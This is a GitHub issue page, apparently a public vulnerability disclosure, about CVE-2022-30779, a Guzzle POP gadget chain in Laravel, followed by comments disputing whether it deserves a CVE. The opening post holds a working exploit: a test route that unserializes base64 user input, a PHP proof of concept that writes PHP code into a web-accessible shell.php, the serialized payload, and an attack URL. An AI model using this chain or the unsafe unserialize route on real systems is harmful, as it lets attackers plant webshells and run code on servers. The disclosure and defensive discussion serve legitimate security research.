vulns icon indicating copy to clipboard operation
vulns copied to clipboard

Published 20 hours ago verified publisher icon 1nhann

Laravel 9.1.8 POP chain2

Open 1nhann opened this issue 3 years ago • 9 comments

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30779

build a route to test:

routes/web.php

<?php

use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::get('/', function (\Illuminate\Http\Request $request) {
//    return view('welcome');
    $ser = base64_decode($request->input("ser"));
    unserialize($ser);
    return "ok";
});

poc

<?php

namespace GuzzleHttp\Cookie{
    class SetCookie
    {
        private static $defaults = [
            'Name'     => null,
            'Value'    => null,
            'Domain'   => null,
            'Path'     => '/',
            'Max-Age'  => null,
            'Expires'  => null,
            'Secure'   => false,
            'Discard'  => false,
            'HttpOnly' => false
        ];
        function __construct()
        {
            $this->data['Expires'] = '<?php phpinfo();?>';
            $this->data['Discard'] = 0;
        }
    }
    class CookieJar{
        private $cookies = [];
        private $strictMode;
        function __construct()
        {
            $this->cookies[] = new SetCookie();
        }
    }
    class FileCookieJar extends CookieJar{
        private $filename;
        private $storeSessionCookies;
        function __construct()
        {
            parent::__construct();
            $this->filename = "d:/var/www/untitled/public/shell.php";
            $this->storeSessionCookies = true;
        }
    }
}
namespace{
    $a = new \GuzzleHttp\Cookie\FileCookieJar();
    echo base64_encode(serialize($a));
}

result :

TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MzY6ImQ6L3Zhci93d3cvdW50aXRsZWQvcHVibGljL3NoZWxsLnBocCI7czo1MjoiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAc3RvcmVTZXNzaW9uQ29va2llcyI7YjoxO3M6MzY6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAY29va2llcyI7YToxOntpOjA7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjQ6ImRhdGEiO2E6Mjp7czo3OiJFeHBpcmVzIjtzOjE4OiI8P3BocCBwaHBpbmZvKCk7Pz4iO3M6NzoiRGlzY2FyZCI7aTowO319fXM6Mzk6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAc3RyaWN0TW9kZSI7Tjt9

attack

http://127.0.0.1:1080/?ser=TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MzY6ImQ6L3Zhci93d3cvdW50aXRsZWQvcHVibGljL3NoZWxsLnBocCI7czo1MjoiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAc3RvcmVTZXNzaW9uQ29va2llcyI7YjoxO3M6MzY6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAY29va2llcyI7YToxOntpOjA7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjQ6ImRhdGEiO2E6Mjp7czo3OiJFeHBpcmVzIjtzOjE4OiI8P3BocCBwaHBpbmZvKCk7Pz4iO3M6NzoiRGlzY2FyZCI7aTowO319fXM6Mzk6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAc3RyaWN0TW9kZSI7Tjt9

image-20220513154945425

1nhann avatar May 13 '22 07:05 1nhann

Tested and confirmed working on Laravel v9.12.2 (PHP v8.1.5).

Peek 2022-05-17 16-39

GlitchWitch avatar May 17 '22 03:05 GlitchWitch

Hi!

Thank you @1nhann @GlitchWitch for sharing this,

This is a guzzle POP chain (file write) and has been public for years. For example: https://github.com/ambionics/phpggc/commit/911dbb541233de733134caed872f4cc9fc9efd71#diff-440f971a668a7be90201d1ee799993d495af0eb2673c7fde1b58918bcf019fa4 in 2017.

In any software that uses Guzzle, you can use this chain to write a file, and It's not limited to Laravel. (Object Injection using the unserialize function or PHAR deserialization in PHP<8 is required.)

You can test it in https://github.com/ambionics/phpggc/ Please try Guzzle/FW1 https://github.com/ambionics/phpggc/blob/master/gadgetchains/Guzzle/FW/1/gadgets.php

I don't know why @CVEProject assigned a CVE for a chain because it's NOT a vulnerability.

Thank you.

mir-hossein avatar May 17 '22 23:05 mir-hossein

Hi!

Thank you @1nhann @GlitchWitch for sharing this,

This is a guzzle POP chain (file write) and has been public for years. For example: ambionics/phpggc@911dbb5#diff-440f971a668a7be90201d1ee799993d495af0eb2673c7fde1b58918bcf019fa4 in 2017.

In any software that uses Guzzle, you can use this chain to write a file, and It's not limited to Laravel. (Object Injection using the unserialize function or PHAR deserialization in PHP<8 is required.)

You can test it in https://github.com/ambionics/phpggc/ Please try Guzzle/FW1 https://github.com/ambionics/phpggc/blob/master/gadgetchains/Guzzle/FW/1/gadgets.php

I don't know why @CVEProject assigned a CVE for a chain because it's NOT a vulnerability.

Thank you.

I did not check whether the pop chain I built is exsiting or not before I posted it , because I thought the latest Laravel should have fixed all the potential vulnerabilities of unserializing , that is pop chains those were found before should not work in the latest Laravel , and what I built should be a new one. So it is really a mistake , and I am really sorry . So if the cve will not be revoked , then it should not be credited to me.

1nhann avatar May 18 '22 12:05 1nhann

@1nhann, if you requested the CVE for this issue you should contact Mitre and ask for it to be revoked. Thank you for acknowledging that this is not a vulnerability 👍

darakian avatar May 25 '22 21:05 darakian

It seems the NVD has assigned a critical severity to this POP chain (5/24/2022). CVSS3.1: 9.8/10 link

Also, it's NOT the first time that MITRE assigns a CVE for a chain, Example: CVE-2021-43503

I think documenting these types of security risks is very good, but assigning a CVE to them is NOT a good idea.

Maybe @cve-team or @darakian (Github security team) will find another way to document it, something like SRE-2022-????? (Security Risk Enumeration) or EF-2022-????? (Exploitation Facilitator) to have a dictionary of potential security risks and inform users about them.

There are other security risks in famous packages/libraries that users use, but are unaware of the risks (I don't mean POP chains only). A dictionary will help (I think).

Thank you.

mir-hossein avatar May 26 '22 15:05 mir-hossein

@mir-hossein we (github) can't change the CVE, but we are omitting this from our advisory database to keep the noise down. To get this changed outside of github the CVE itself will need to be revoked and/or marked as disputed.

To revoke the requestor ( @1nhann I think) should reach out to Mitre, inform them that the CVE was requested erroneously and ask that it be revoked.

To get this disputed the laravel folks will need to get involved, contact mitre, and to inform them that the vulnerability does not affect the project.

darakian avatar May 26 '22 16:05 darakian

@darakian Thank you!

mir-hossein avatar May 26 '22 16:05 mir-hossein

Hello !, Is this vulnerability fixed yet and does it only concern the 9.1.8 laravel version ?

arijgr avatar Aug 08 '22 11:08 arijgr

Hello !, Is this vulnerability fixed yet and does it only concern the 9.1.8 laravel version ?

Hello @arijgr, This isn't a vulnerability, just a GC. If you don't use the unserialize function (with user-controlled input), don't worry about it.

mir-hossein avatar Aug 11 '22 17:08 mir-hossein